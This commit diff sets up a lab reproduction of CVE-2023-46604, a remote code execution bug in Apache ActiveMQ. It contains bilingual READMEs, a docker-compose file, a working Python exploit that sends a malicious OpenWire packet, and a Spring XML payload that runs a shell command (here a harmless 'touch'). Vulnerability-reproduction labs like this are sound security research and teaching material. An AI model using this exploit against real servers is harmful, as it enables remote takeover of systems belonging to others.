first commit

activemq/CVE-2023-46604/README.md

@@ -0,0 +1,57 @@
+# Apache ActiveMQ OpenWire Protocol Deserialization RCE (CVE-2023-46604)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache ActiveMQ is an open source messaging middleware developed by the American Pachitea (Apache) Software Foundation that supports Java messaging services, clustering, Spring framework, and more.
+
+OpenWire protocol is designed by ActiveMQ, to allow native access to ActiveMQ from a number of different languages and platforms. Apache ActiveMQ prior to 5.18.2 was affected by a deserialization vulnerability. This vulnerability may allow remote attackers with network access privileges to execute arbitrary shell commands by manipulating the serialized class types in the OpenWire protocol, leading to the instantiation of any class on the classpath of the agent.
+
+References:
+
+- <https://activemq.apache.org/news/cve-2023-46604>
+- <https://xz.aliyun.com/t/12929>
+- <https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/>
+- <https://forum.butian.net/share/2566>
+
+## Environment setup
+
+ActiveMQ listens to following 2 ports:
+
+| Default port | Default Condition                    |
+|--------------|--------------------------------------|
+| 8161 (web)   | Remote access requires configuration |
+| 61616 (tcp)  | Remote access allowed                |
+
+The deserialization issue exists in the port 61616.
+
+Enter following commands to run a ActiveMQ 5.17.3 server:
+
+```
+docker compose up -d
+```
+
+Please access `http://your-ip:8161` to confirm that the service has started successfully before exploitation, although we only need to use the port 61616 after that.
+
+## Exploit
+
+You can quickly start an HTTP server in the folder where the [poc.xml](poc.xml) file is located using the Python3 http.server module:
+
+```shell
+python3 -m http.server 6666
+```
+
+Then execute the [poc.py](poc.py):
+
+```shell
+python3 poc.py target port http://ip of http server/poc.xml
+```
+
+You can check inside the ActiveMQ container using the following command:
+
+```
+docker exec cve-2023-46604-activemq-1 ls -l /tmp
+```
+
+If you see the output showing that touch /tmp/activeMQ-RCE-success has been executed successfully, then the exploit has worked.
+
+![01.png](01.png)

activemq/CVE-2023-46604/README.zh-cn.md

@@ -0,0 +1,55 @@
+# Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞（CVE-2023-46604）
+
+Apache ActiveMQ 是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。
+
+OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActiveMQ 5.18.2版本及以前，OpenWire协议通信过程中存在一处反序列化漏洞，该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型，导致代理的类路径上的任何类实例化，从而执行任意命令。
+
+参考链接：
+
+- <https://activemq.apache.org/news/cve-2023-46604>
+- <https://xz.aliyun.com/t/12929>
+- <https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/>
+- <https://forum.butian.net/share/2566>
+
+## 环境搭建
+
+ActiveMQ运行后，默认监听如下两个端口：
+
+| 默认端口      | 默认条件      |
+|-----------|-----------|
+| 8161  web | 需配置才可远程访问 |
+| 61616 tcp | 远程访问      |
+
+反序列化漏洞出现在61616端口中。
+
+执行如下命令启动一个ActiveMQ 5.17.3版本服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8161`检查服务是否运行成功。但实际上利用该漏洞，并不需要能够访问8161端口。
+
+## 漏洞复现
+
+首先，启动一个HTTP反连服务器，其中包含我们的[poc.xml](poc.xml)：
+
+```shell
+python3 -m http.server 6666
+```
+
+然后，执行[poc.py](poc.py)，传入的三个参数分别是目标服务器地址、端口，以及包含poc.xml的反连平台URL：
+
+```shell
+python3 poc.py target port http://ip of http server/poc.xml
+```
+
+执行完成后，进入ActiveMQ容器：
+
+```
+docker exec cve-2023-46604-activemq-1 ls -l /tmp
+```
+
+可见，`touch /tmp/activeMQ-RCE-success`已经被成功执行：
+
+![01.png](01.png)

activemq/CVE-2023-46604/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2'
+services:
+ activemq:
+   image: vulhub/activemq:5.17.3
+   ports:
+    - "61616:61616"
+    - "8161:8161"
+    - "5005:5005"

activemq/CVE-2023-46604/poc.py

@@ -0,0 +1,36 @@
+import io
+import socket
+import sys
+
+
+def main(ip, port, xml):
+    classname = "org.springframework.context.support.ClassPathXmlApplicationContext"
+    socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    socket_obj.connect((ip, port))
+
+    with socket_obj:
+        out = socket_obj.makefile('wb')
+        # out = io.BytesIO()  # 创建一个内存中的二进制流
+        out.write(int(32).to_bytes(4, 'big'))
+        out.write(bytes([31]))
+        out.write(int(1).to_bytes(4, 'big'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(int(1).to_bytes(4, 'big'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(len(classname).to_bytes(2, 'big'))
+        out.write(classname.encode('utf-8'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(len(xml).to_bytes(2, 'big'))
+        out.write(xml.encode('utf-8'))
+        # print(list(out.getvalue()))
+        out.flush()
+        out.close()
+
+
+if __name__ == "__main__":
+    if len(sys.argv) != 4:
+        print("Please specify the target and port and poc.xml: python3 poc.py 127.0.0.1 61616 "
+              "http://192.168.0.101:8888/poc.xml")
+        exit(-1)
+    main(sys.argv[1], int(sys.argv[2]), sys.argv[3])

activemq/CVE-2023-46604/poc.xml

@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<beans xmlns="http://www.springframework.org/schema/beans"
+       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+       xsi:schemaLocation="http://www.springframework.org/schema/beans
+       http://www.springframework.org/schema/beans/spring-beans.xsd">
+    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
+        <constructor-arg>
+            <list>
+                <value>touch</value>
+                <value>/tmp/activeMQ-RCE-success</value>
+            </list>
+        </constructor-arg>
+    </bean>
+</beans>